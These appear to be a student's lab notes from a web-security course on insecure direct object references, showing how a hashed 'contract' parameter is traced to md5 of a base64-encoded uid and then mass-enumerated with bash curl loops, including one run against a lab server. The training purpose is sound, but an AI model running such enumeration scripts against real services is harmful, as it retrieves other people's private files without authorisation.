9 - Bypassing Encoded References

- Sometimes web apps hash or encode their object references, making enumeration more difficult, but it may still be possible - If we visit `/contracts.php` and click on a file it will start downloading the associated file - If we intercept the request associated with the download, we will see a POST request to `download.php` as shown below ![[images/Pasted image 20260111191326.png]] - Here the POST request to `download.php` has the following hashed or encoded payload ```php contract=cdd96d3cc73d1dbdaffa03cc6cd7339b ``` - Using a `download.php` script to download files is a common practice to avoid directly linking to files, as that may be exploitable with multiple web attacks - In this case, the web application is not sending the direct reference in cleartext but appears to be hashing it in an `md5` format - We can attempt to hash various values, like `uid`, `username`, `filename`, etc. to see if any of their `md5` hashes match the above payload's value - Start with `md5` hashing `uid=1` - This does not match ```bash echo -n 1 | md5sum c4ca4238a0b923820dcc509a6f75849b - ``` - In some advanced cases, we may also utilize `Burp Comparer` and fuzz various values and then compare each to our hash to see if we find any matches - In this case, the `md5` hash could be for a unique value or a combination of values, which would be very difficult to predict, making this direct reference a `Secure Direct Object Reference` # Function Disclosure - Because most modern web apps are developed using JavaScript frameworks, like `Angular`, `React`, or `Vue.js`, many web devs may make the mistake of performing sensitive functions on the front-end, which would expose them to attackers - For example, if the above hash was being calculated on the front-end, we can study the function and then replicate what it's doing to calculate the same hash - If we look at the link to the file in the source code, we can see that it is calling a JavaScript function with `javascript:downloadContract('1')` - If we look at the `downloadContract()` function in the source code we will see that ```javascript function downloadContract(uid) { $.redirect("/download.php", { contract: CryptoJS.MD5(btoa(uid)).toString(), }, "POST", "_self"); } ``` - Here, the value being md5 hashed is `btoa(uid)`, which is the `base64` encoded string of the `uid` variable - We can check this and compare against the above payload value in the POST request ```bash echo -n 1 | base64 -w 0 | md5sum cdd96d3cc73d1dbdaffa03cc6cd7339b - ``` # Mass Enumeration - As with the previous section, we can write a simple BASH script to retrieve all employee contracts - First, we can calculate hashes for the base64 version of the first 10 `uids` ```bash for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done ``` - Second, we can create a BASH script that makes POST request to `download.php` with the above values ```bash #!/bin/bash for i in {1..10}; do for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php done done ``` # Exercise - `ping` test ![[images/Pasted image 20260111192810.png]] - `nmap` scan ![[images/Pasted image 20260111192855.png]] - visit `/contracts.php` - having issues again visiting the web page ![[images/Pasted image 20260111193640.png]] - source code ![[images/Pasted image 20260111193740.png]] ![[images/Pasted image 20260111193049.png]] - Intercept the download ![[images/Pasted image 20260111193755.png]] - Forward ![[images/Pasted image 20260111193833.png]] - it looks like we only have to base64 encode the `uid` - create a BASH script to snag files for first 20 `uids` ```bash #!/bin/bash for i in {1..20}; do for base64 in $(echo -n $i | base64 -w 0); do curl -sOJ "http://83.136.255.170:33816/download.php?contract=$base64" done done ``` - after running we have below files in the local directory ![[images/Pasted image 20260111194901.png]] - only one is not 0 sized > `cat` this file